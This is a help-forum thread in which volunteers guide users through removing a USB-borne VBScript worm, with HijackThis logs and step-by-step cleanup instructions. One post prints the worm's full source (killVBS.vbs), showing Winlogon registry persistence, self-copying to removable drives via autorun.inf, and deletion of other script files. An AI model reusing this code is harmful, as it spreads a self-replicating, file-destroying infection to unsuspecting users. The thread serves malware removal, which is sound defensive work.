killVBS.vbs

Hi every38,
Your log looks clean.. You’ll notice, after running killvbs remover, there is no more F2 line in your log. A very good sign that it’s gone…
Suggestions:
Either up grade your IE to IE7 or use your Firefox, much safer.
Get an AntiVirus. I use and recommend AVAST -> HERE!
Get a 3rd party FireWall. I use and recommend ZoneAlarm -> HERE!
Get a Trojan Blocker. I use and recommend BOClean -> HERE!
To clean your Flash Drives use Flash Disinfector by sUBs -> HERE!
Flash Disinfector Will
- Clean up junks created by flash malwares
- Deletes autorun.inf from every root folder
- Fix back damages done to your system
- Creates an autorun.inf folder in the root of your system drives
How To Use The Tool
*Please remember to disable any AV / ScriptBlockers as they might detect Flash Disinfector to be malicious and block it. Hence, the failure in executing. You can enable them back after the cleaning process*
Or just use your Command method, if it works……..

That’s about it, just let me know if there is anything else…………

2OG

 

2OG,

thanks for your help. but it seems ihave another problem. when i copy files to my usb drvives, there is a message saying that wscript.exe cannot be found and then the copying stops.any suggestions?

 

Hi every38. Just wanted to put my two cents in. Hope you don't mind.

The legitimate wscript.exe is a process relating to Microsoft Windows operating system which allows additional functions to scripting. Also, it can be malware disguising itself. The two reasons I can think of for such an error are these: 1. When you copy files into the usb drives, a script automatically runs, but since wscript.exe does not exist, the script cannot run properly. 2. wscript is an autorun malware which was deleted, but some reference on your drive points to it.

Please check C:\Windows\system32 for the presence of wscript.exe. If it does not exist, there is a chance that it is explaination 1.

A more probable explaination is number 2. The malware Vbswg.Aq is highly related to your problem, and I suggest reading about it and how to thoroughly remove it from your system. Before you start though, please check for the presence of any unknown dll, exe, or vbs files at the beginning of each usb drive. Also, right click on the usb drive icon to see if there are squiggly characters. Click to explore, and then delete the unknown dll, exe, or vbs files and any autorun.inf file. You may have to enable hidden files/hidden protected system files in folder options to see these things.

Here are a few examples of websites you can read from:
http://www.sophos.com/security/analyses/viruses-and-spyware/vbsvbswgaq.html
http://antivirus.about.com/library/weekly/aa060602a.htm
http://www.f-secure.com/v-descs/vbswg_aq.shtml
http://www.pspl.com/virus_info/worms/shakira.htm

Best Regards

 

every38,

Have you used Flash Disinfector to disinfect your Flash drives?
It is possible that your wscript file has been lost…

Thanks for the input, cadavfrew. I tend to lean toward your explanation 1.

If the wscript.exe file is not present in C:\Windows\System32 then I would try to recover it using SFC /scannow.
To do this:
Check this article for using SFC /scannow
>> HERE


Gonna catch a few zzzzz’s now
2OG

 

Characteristics of a virus
Under the root of the documents generated autorun.inf
Code is as follows:

killVBS.vbs
shellexecute = wscript.exe killVBS.vbs

Feature 2 virus
C: \ WINDOWS \ SYSTEM killVBS.vbs vbs script generated by the host operating wscript.exe
String to the registry start of the filling and
C: \ WINDOWS1 \ system32 \ userinit.exe, C: \ WINDOWS1 \ system32 \ wscript.exe C: \ WINDOWS1 \ system32 \ killVBS.vbs
killVBS.vbs vbs script code as follows:


'************************************************* *********
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'************************************************* *********
Option Explicit
On Error Resume Next
Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg
Set Fso = CreateObject ( "Scripting.FileSystemObject")
Set Shells = CreateObject ( "Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder (0)
Set SystemDir = Fso.GetSpecialFolder (1)
Set File = Fso.GetFile (WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream (1, -2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count = Drv.DriveType
Do
If Not Fso.FileExists (SystemDir & "\ killVBS.vbs") then
set WriteAll = Fso.CreateTextFile (SystemDir & "\ killVBS.vbs", 2, true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile (SystemDir & "\ killVBS.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Userinit", SystemDir & "\ userinit.exe," & _
SystemDir & "\ wscript.exe" & SystemDir & "\ killVBS.vbs"
For Each Drives In InDrive

If Drives.DriveType = 2 Then
LookVBS "inf", Drives.Path & "\"
LookVBS "INF", Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path <> "A:" Then
Shells.Regdelete "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ MS32DLL"
Shells.RegWrite "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", ""
Shells.RegWrite "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page", ""
Shells.RegWrite "HKCR \ vbsfile \ DefaultIcon", "% SystemRoot% \ System32 \ WScript.exe, 2"
LookVBS "vbs", WinDir & "\"
LookVBS "vbs", Drives.Path & "\"
If Drives.DriveType = 1 Then
If Drives.Path <> "A:" Then
If Not Fso.FileExists (Drives.Path & "\ killVBS.vbs") Then
Set WriteAll = Fso.CreateTextFile (Drives.Path & "\ killVBS.vbs", 2, True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile (Drives.Path & "\ killVBS.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists (Drives.Path & "\ autorun.inf") Or Fso.FileExists (Drives.Path & "\ AUTORUN.INF") Then
Set Chg = Fso.GetFile (Drives.Path & "\ autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile (Drives.Path & "\ autorun.inf", 2, True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute = wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile (Drives.Path & "\ autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile (Drives.Path & "\ autorun.inf", 2, True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute = wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile (Drives.Path & "\ autorun.inf")
WriteAll.Attributes = -1
End if
End If
End if
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count <> 1
sub LookVBS (File2Find, SrchPath)
Dim oFileSys, oFolder, oFile, Cut, Delete
Set oFileSys = CreateObject ( "Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder (SrchPath)
For Each oFile In oFolder.Files
Cut = Right (oFile.Name, 3)
If UCase (Cut) = UCase (file2find) Then
If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile (srchpath & oFile.Name, true)
End If
Next
End sub


Performance of the virus is as follows
A string to IE
2-delete self-replication
U-3 infection

 

Hi its Jenny here. I dont know much about computers I'm using BitDefender atm (internet security) i was reading one of the replies before and DL HJT heres my log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:22:27 PM, on 8/30/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\BitDefender\BitDefender Communicator\xcommsvr.exe
C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
C:\Program Files\BitDefender\BitDefender 2008\vsserv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Nero\Nero 7\InCD\NBHGui.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\BitDefender\BitDefender 2008\bdagent.exe
C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe
C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe
C:\Program Files\Brother\ControlCenter3\brccMCtl.exe
C:\Program Files\IObit\IObit SmartDefrag\IObit SmartDefrag.exe
C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwsoemon.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\WINDOWS\system32\LVCOMSX.EXE
C:\Program Files\Logitech\Video\CameraAssistant.exe
C:\WINDOWS\system32\ElkCtrl.exe
C:\Program Files\Brother\Brmfcmon\BrMfcmon.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\DNA\btdna.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Sony\Sony Picture Utility\VolumeWatcher\SPUVolumeWatcher.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Program Files\BitDefender\BitDefender 2008\uiscan.exe
C:\Program Files\BitDefender\BitDefender 2008\seccenter.exe
C:\WINDOWS\explorer.exe
D:\Products\Internet Security 2008\en\install\32bits\bitdefender_internetsecurity_2008_32b.exe
C:\DOCUME~1\USER\LOCALS~1\Temp\IXP001.TMP\Setup.Exe
C:\Program Files\Safari\Safari.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.imesh.com/sidebar.html?src=ssb
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: (no name) - {00A6FAF6-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs
O2 - BHO: MyWebSearch Search Assistant BHO - {00A6FAF1-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: mwsBar BHO - {07B18EA1-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL
O2 - BHO: UrlHelper Class - {474597C5-AB09-49d6-A4D5-2E8D7341384E} - C:\Program Files\iMesh Applications\iMesh MediaBar\iMeshIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: BitDefender Toolbar - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2008\IEToolbar.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: iMesh MediaBar - {B7D3E479-CC68-42B5-A338-938ECE35F419} - C:\Program Files\iMesh Applications\iMesh MediaBar\iMeshMediaBar.dll
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [SecurDisc] C:\Program Files\Nero\Nero 7\InCD\NBHGui.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2008\IEShow.exe"
O4 - HKLM\..\Run: [BDAgent] "C:\Program Files\BitDefender\BitDefender 2008\bdagent.exe"
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [PaperPort PTD] "C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe"
O4 - HKLM\..\Run: [IndexSearch] "C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe"
O4 - HKLM\..\Run: [PPort11reminder] "C:\Program Files\ScanSoft\PaperPort\Ereg\Ereg.exe" -r "C:\Documents and Settings\All Users\Application Data\ScanSoft\PaperPort\11\Config\Ereg\Ereg.ini
O4 - HKLM\..\Run: [BrMfcWnd] C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN
O4 - HKLM\..\Run: [ControlCenter3] C:\Program Files\Brother\ControlCenter3\brctrcen.exe /autorun
O4 - HKLM\..\Run: [SmartDefrag] "C:\Program Files\IObit\IObit SmartDefrag\IObit SmartDefrag.exe" /StartUp
O4 - HKLM\..\Run: [MyWebSearch Plugin] rundll32 C:\PROGRA~1\MYWEBS~1\bar\1.bin\M3PLUGIN.DLL,UPF
O4 - HKLM\..\Run: [My Web Search Bar] rundll32 C:\PROGRA~1\MYWEBS~1\bar\1.bin\MWSBAR.DLL,S
O4 - HKLM\..\Run: [MyWebSearch Email Plugin] C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwsoemon.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE
O4 - HKLM\..\Run: [LogitechCameraAssistant] C:\Program Files\Logitech\Video\CameraAssistant.exe
O4 - HKLM\..\Run: [LogitechVideo[inspector]] C:\Program Files\Logitech\Video\InstallHelper.exe /inspect
O4 - HKLM\..\Run: [LogitechCameraService(E)] C:\WINDOWS\system32\ElkCtrl.exe /automation
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\RunOnce: [wextract_cleanup0] rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\USER\LOCALS~1\Temp\IXP001.TMP\"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [BitTorrent DNA] "C:\Program Files\DNA\btdna.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MyWebSearch Email Plugin] C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwsoemon.exe
O4 - Startup: Picture Motion Browser Media Check Tool.lnk = C:\Program Files\Sony\Sony Picture Utility\VolumeWatcher\SPUVolumeWatcher.exe
O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbaredits/menusearch.jhtml?p=ZKfox000
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Windows &Live Favorites - http://favorites.live.com/quickadd.aspx
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/win...ls/en/x86/client/wuweb_site.cab?1212561845984
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: BitDefender Desktop Update Service (LIVESRV) - BitDefender SRL - C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
O23 - Service: Logitech Process Monitor (LVPrcSrv) - Logitech Inc. - c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
O23 - Service: My Web Search Service (MyWebSearchService) - MyWebSearch.com - C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwssvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: BitDefender Virus Shield (VSSERV) - BitDefender S.R.L. - C:\Program Files\BitDefender\BitDefender 2008\vsserv.exe
O23 - Service: BitDefender Communicator (XCOMM) - BitDefender - C:\Program Files\Common Files\BitDefender\BitDefender Communicator\xcommsvr.exe

--
End of file - 11005 bytes

 

@ j2k3,

Hi Jenny

My handle is 2oldGeek and I will help you to remove any infection(s) that you may have.

I will be giving you a series of instructions that need to be followed in the order in which I give them to you.

If for any reason you do not understand an instruction or are just unsure then please do not guess, simply post back with your questions/concerns and we will go through it again.

Please do not start another thread or topic, I will assist you at this thread until we solve your problems.

Lastly the fix may take several attempts and my replies may take some time but I will stick with it if you do the same.

That said, All advice given by anyone volunteering here, is taken at own risk.
While best efforts are made to assist in removing infections safely, unexpected stuff can happen.

Jenny, you are infected with some nasty Trojans and Malware, so let’s start the cleanup like this:

Please download ATF Cleaner by Atribune & save it to your desktop.

Double-click ATF-Cleaner.exe to run the program.

• Under Main "Select Files to Delete" choose: Select All.
• Click the Empty Selected button.

• If you use Firefox browser click Firefox at the top and choose: Select All
• Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.

• If you use Opera browser click Opera at the top and choose: Select All
• Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.

• Click Exit on the Main menu to close the program.



Next:

Download Malwarebytes' Anti-Malware to your desktop.

Double-click mbam-setup.exe and follow the prompts to install the program.

• At the end, be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
• If an update is found, it will download and install the latest version.

• Once the program has loaded, select Perform full scan, then click Scan.

• When the scan is complete, click OK, then Show Results to view the results.
• Make sure that everything is checked, and click Remove Selected. <-- Don't forget this.

• When completed, a log will open in Notepad. Please save it to a convenient location. The log can also be found here: C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt

• Please post the MBAM Log and a fresh HJT log in your next reply.


2OG